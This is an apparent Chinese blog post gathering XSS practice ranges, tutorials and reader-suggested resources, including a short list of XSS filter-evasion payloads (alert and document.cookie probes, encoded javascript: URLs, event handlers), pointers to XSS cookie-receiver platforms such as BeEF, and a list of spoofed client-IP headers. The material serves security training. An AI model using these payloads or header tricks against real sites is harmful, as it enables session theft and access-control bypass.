Openresty Python LUA

Openresty Python LUA 学习资料 QQ群:397745473

0%

xss靶场和教程整理

xss靶场

QQ群:397745473

谷歌的XSS GAME:http://xss-game.appspot.com/

xss挑战之旅:https://zhuanlan.zhihu.com/p/25336395

xss-quiz:http://hpdoger.me/2018/08/02/xss%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%EF%BC%88%E4%BA%8C%EF%BC%89%E4%B9%8B%E6%80%92%E5%88%B7xss-quiz/

http://test.xss.tv/

http://xss.tv/payload/xss/

https://xss.haozi.me/

http://prompt.ml/0

教程:

漏洞银行的

https://skills.bugbank.cn/skill.html?type=4

常见XSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<script>alert('xss')</script> //默认形式

<ScrIpT>alert("xss")</SCriPt> //变换大小写

"/><script>alert(document.cookie)</script><!--  // <!-- 表示的意思是 闭合注释

<script>alert(document.cookie)</script><!--

"onclick="alert(document.cookie)

<img src=javascript:alert("xss")></img //变换形式

<img src=j&#97vascript:alert("xss")> //使用ASCII表示

<IMG SRC="jav&#x09;ascript:alert('XSS');" > //插入干扰

<DIV STYLE="width:expression(alert(163));"> //其他属性

<DIV STYLE="xss:expr/*XSS*/ession(alert(163))"> //再干扰

<img src="#" onerror=alert(/xss/)> //借用事件

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>// flash跨站

XSS原理

xss 原理 :http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

https://www.cnblogs.com/musicmovie/p/3445246.html

xss 教程

1、【yueyan科普系列】XSS跨站脚本攻击–yueyan

2、存储型XSS的成因及挖掘方法–pkav

3、跨站脚本攻击实例解析–泉哥

4、XSS高级实战教程–心伤的瘦子

5、XSS利用与挖掘-更新版–GAINOVER

6、XSS在线教学–gainover

http://xsst.sinaapp.com/example/1-1.php

评论

1.可以去推特翻一下xss payloads,上面会不定期放一些xss challenge:https://twitter.com/XssPayloads

2.一些偏基础一点的靶场:
alert(1) to win
XSS Challenges
prompt(1) to win

3.顺便推荐一个xss平台 个人感觉可以 beef

4.这几个靶场其实够了呀,认真搞一遍 然后看一些乌云和hackerone上面的一些xss案例 基本差不多了

5.乌云的 心伤的瘦子 等实战教程

6.用的多了 无非就是在绕过 推荐去关注Twitter的一些绕过

7.XSS_Cheat_Sheet_2018_Edition资料分享,国外20美金 https://www.t00ls.net/viewthread.php?tid=49978

链接: https://pan.baidu.com/s/1zoC-f4h6j0dQKNQXARJh2w 提取码:

8.xss系列教程【更新下载地址】

链接: https://pan.baidu.com/s/1xPQBQZ7o4VwW60HRBP8PEw 提取码:

https://www.t00ls.net/viewthread.php?tid=30394

9.第一系列的eval,可以看下这个 http://bobao.360.cn/learning/detail/292.html

10.https://github.com/firesunCN/BlueLotus_XSSReceiver

11.蓝莲花在线搭建的XSS

12.https://paper.seebug.org/376/

13:

1
2
3
4
5
6
7
8
9
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Forwarded-Host: 127.0.0.1

14:心伤的瘦子

http://www.secevery.com:4321/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90

http://wooyun.2xss.cc/whitehat_detail.php?whitehat=%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90

15:http://xsst.sinaapp.com/example/1-1.php

参考:https://www.t00ls.net/thread-49676-1-1.html

QQ群:397745473

欢迎关注我的其它发布渠道